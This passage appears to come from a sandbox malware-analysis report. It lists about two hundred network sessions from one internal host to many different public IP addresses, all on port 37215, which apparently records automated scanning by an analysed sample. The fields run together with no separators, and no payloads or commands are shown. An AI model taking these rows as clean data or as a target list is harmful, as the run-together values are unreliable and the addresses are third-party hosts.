                                                  6639192.168.2.1352328147.168.58.1737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6640192.168.2.133695024.101.53.11337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6641192.168.2.1358362135.161.11.6737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6642192.168.2.1338924157.7.52.12037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6643192.168.2.1349208157.224.125.17737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6644192.168.2.1353796162.116.39.17637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6645192.168.2.1343340186.238.253.15837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6646192.168.2.1354196157.124.96.5637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6647192.168.2.134170241.212.0.2437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6648192.168.2.1356922197.148.117.14237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6649192.168.2.1334560128.46.134.3337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6650192.168.2.1340924157.142.174.19237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6651192.168.2.133422049.73.184.4637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6652192.168.2.1359484157.148.162.5837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6653192.168.2.134437641.222.249.4437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6654192.168.2.1358924197.8.239.9137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6655192.168.2.1348664116.135.96.5737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6656192.168.2.134051641.7.82.19637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6657192.168.2.135652482.210.79.21537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6658192.168.2.1338050157.101.96.17337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6659192.168.2.1341268168.34.36.23337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6660192.168.2.134521841.22.180.19537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6661192.168.2.135250241.211.57.12737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6662192.168.2.1334516197.45.71.18337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6663192.168.2.1338696197.247.32.1837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6664192.168.2.1343386190.29.233.3137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6665192.168.2.1354146197.60.23.11037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6666192.168.2.135750241.173.41.7837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6667192.168.2.1349624197.91.52.19037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6668192.168.2.135115041.45.27.18537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6669192.168.2.13494222.219.229.21037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6670192.168.2.135045241.37.58.11737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6671192.168.2.133932441.210.241.25437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6672192.168.2.136021641.236.52.10537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6673192.168.2.1360046157.229.31.337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6674192.168.2.133626441.128.93.7737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6675192.168.2.133509241.208.252.12437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6676192.168.2.1345882197.160.26.25537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6677192.168.2.1335696197.92.164.19537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6678192.168.2.133507876.249.232.7937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6679192.168.2.1354812197.216.141.15037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6680192.168.2.134460641.143.20.19737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6681192.168.2.1341014197.163.99.337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6682192.168.2.1338788197.35.170.11437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6683192.168.2.1342572157.25.131.18037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6684192.168.2.1359532197.85.243.20537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6685192.168.2.1339212197.73.168.16137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6686192.168.2.1353826157.127.39.18437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6687192.168.2.133739851.252.202.8437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6688192.168.2.1342700157.72.93.837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6689192.168.2.1349400157.166.198.22337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6690192.168.2.1346016197.86.158.22737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6691192.168.2.133445641.145.152.18337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6692192.168.2.1359648132.75.208.6237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6693192.168.2.1353036197.115.10.13137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6694192.168.2.135311041.30.214.15637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6695192.168.2.1351338182.144.160.6037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6696192.168.2.1348408157.202.165.9537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6697192.168.2.1358184169.238.138.15037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6698192.168.2.1356276194.89.236.13837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6699192.168.2.1352778157.170.16.5037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6700192.168.2.1333824157.134.222.11037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6701192.168.2.1352280115.216.58.9037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6702192.168.2.1356076129.65.13.11737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6703192.168.2.1345534157.90.234.9937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6704192.168.2.1336496157.219.189.4937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6705192.168.2.1356936114.4.17.22937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6706192.168.2.1335356197.200.12.11337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6707192.168.2.133895241.219.191.17437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6708192.168.2.133667241.50.130.20037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6709192.168.2.1343762197.200.241.23937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6710192.168.2.1343464197.83.141.10437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6711192.168.2.1333548157.166.109.8637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6712192.168.2.1332936157.230.43.9137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6713192.168.2.1346606197.198.228.237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6714192.168.2.1353110157.174.109.4337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6715192.168.2.135475041.189.227.24737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6716192.168.2.134924481.137.35.1137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6717192.168.2.1343072197.226.52.8137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6718192.168.2.1340838157.218.104.3537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6719192.168.2.1348410157.148.87.17537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6720192.168.2.1343856157.246.183.5237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6721192.168.2.1342734197.117.234.13837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6722192.168.2.134547241.150.126.22737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6723192.168.2.1347240197.84.242.17137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6724192.168.2.133285241.139.15.7537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6725192.168.2.1344142180.7.191.3137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6726192.168.2.1334106197.4.208.21337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6727192.168.2.1339304157.52.67.9837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6728192.168.2.1347830197.43.15.6137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6729192.168.2.135598412.215.252.17237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6730192.168.2.1358900157.214.40.16037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6731192.168.2.133449441.179.126.16037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6732192.168.2.1360254157.99.23.25337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6733192.168.2.1348782166.234.51.5737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6734192.168.2.1340954157.33.90.10137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6735192.168.2.133553879.238.103.11937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6736192.168.2.1336514197.170.135.9537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6737192.168.2.135663441.184.8.8337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6738192.168.2.1351952157.235.155.7937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6739192.168.2.133364041.78.45.5637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6740192.168.2.1348144197.14.61.12437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6741192.168.2.1359024201.113.9.1137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6742192.168.2.1357786197.72.245.19937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6743192.168.2.1344234157.209.155.20837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6744192.168.2.1345108157.197.206.22637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6745192.168.2.1344826197.214.135.18837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6746192.168.2.134938041.39.144.5837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6747192.168.2.1358184197.159.227.1337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6748192.168.2.1357478157.152.15.25437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6749192.168.2.1350156157.174.53.3237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6750192.168.2.1341796197.38.242.7837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6751192.168.2.1356334157.159.137.7137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6752192.168.2.133398638.125.122.14337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6753192.168.2.134728085.35.109.25437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6754192.168.2.135541241.242.52.19037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6755192.168.2.134004897.146.121.25137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6756192.168.2.135834841.57.213.3937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6757192.168.2.135406641.115.168.1437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6758192.168.2.1342994123.132.29.16337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6759192.168.2.133915884.30.67.20937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6760192.168.2.1343288197.43.196.23437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6761192.168.2.1343228142.111.185.3137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6762192.168.2.1354130157.17.26.1437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6763192.168.2.133666241.145.78.13337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6764192.168.2.1346648197.7.247.3937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6765192.168.2.1344196213.234.67.15737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6766192.168.2.133875241.138.208.537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6767192.168.2.1352864197.133.63.12237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6768192.168.2.1358970197.132.125.24237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6769192.168.2.134118841.187.200.8337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6770192.168.2.134759241.248.159.22237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6771192.168.2.1342708216.117.230.21537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6772192.168.2.134895636.83.120.13237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6773192.168.2.1339294197.207.107.5437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6774192.168.2.1345932197.71.115.13437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6775192.168.2.1355028197.81.212.14637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6776192.168.2.1356626197.244.165.15737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6777192.168.2.1352508197.118.63.16237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6778192.168.2.133517041.39.4.24737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6779192.168.2.1348200197.49.11.7337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6780192.168.2.1355726157.177.74.11937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6781192.168.2.135454641.81.141.24637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6782192.168.2.134631841.35.28.537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6783192.168.2.1351356197.119.56.13137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6784192.168.2.135116841.237.195.8037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6785192.168.2.1337884157.8.193.24537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6786192.168.2.1335298157.64.49.19937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6787192.168.2.133331441.74.165.12437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6788192.168.2.133372641.18.154.3037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6789192.168.2.135568241.193.16.14537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6790192.168.2.133717841.254.1.15337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6791192.168.2.135816289.6.45.19637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6792192.168.2.1339138197.53.80.12537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6793192.168.2.1355620197.121.93.22937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6794192.168.2.1340464197.146.117.8037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6795192.168.2.1339750197.184.233.21437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6796192.168.2.1336252157.200.152.19137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6797192.168.2.1349868157.113.161.23837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6798192.168.2.1359948157.152.140.24337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6799192.168.2.1335312157.161.106.19037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6800192.168.2.133436641.45.203.3237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6801192.168.2.1345938157.47.87.14137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6802192.168.2.1341408194.193.79.2837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6803192.168.2.1336108197.25.171.23537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6804192.168.2.133458441.197.32.5937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6805192.168.2.1351714157.236.160.15437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6806192.168.2.134047641.79.182.8537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6807192.168.2.135868641.7.242.23837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6808192.168.2.135892841.55.68.13237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6809192.168.2.1356100197.140.121.18637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6810192.168.2.1334506197.2.155.1537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6811192.168.2.1349536157.199.90.19937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6812192.168.2.1333326193.169.163.13437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6813192.168.2.1350302157.133.155.25537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6814192.168.2.1334018197.184.170.21737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6815192.168.2.1340268200.7.33.15937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6816192.168.2.134117441.200.63.10637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6817192.168.2.1340250157.23.158.18037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6818192.168.2.1346756197.167.170.22237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6819192.168.2.134024641.241.109.7437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6820192.168.2.1335334197.70.62.3937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6821192.168.2.1335220197.83.37.20737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6822192.168.2.133490441.131.35.20637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6823192.168.2.134541241.89.172.12537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6824192.168.2.1348796157.157.239.22137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6825192.168.2.133426641.111.108.4537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6826192.168.2.1337762157.230.193.5437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6827192.168.2.1354630157.53.91.6437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6828192.168.2.1337068208.45.47.19637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6829192.168.2.1346904157.113.9.2137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6830192.168.2.1350668197.91.70.21137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6831192.168.2.1346498199.142.100.12337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6832192.168.2.1340550157.101.27.1037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6833192.168.2.1336890157.109.62.4737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6834192.168.2.1346136196.92.58.2037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6835192.168.2.134454261.1.61.22137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6836192.168.2.1359498157.84.253.15737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6837192.168.2.134382841.117.180.12837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6838192.168.2.1360724157.65.89.25037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6839192.168.2.135689641.132.109.9037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6840192.168.2.1348566197.237.189.8137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6841192.168.2.135617041.185.204.18837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6842192.168.2.1337438157.2.30.3637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6843192.168.2.1336182157.144.188.14137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6844192.168.2.1358448157.96.89.20337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6845192.168.2.1359882106.41.66.25437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6846192.168.2.1352766101.165.254.6437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6847192.168.2.133448660.2.119.7837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6848192.168.2.1360872144.22.40.4037215
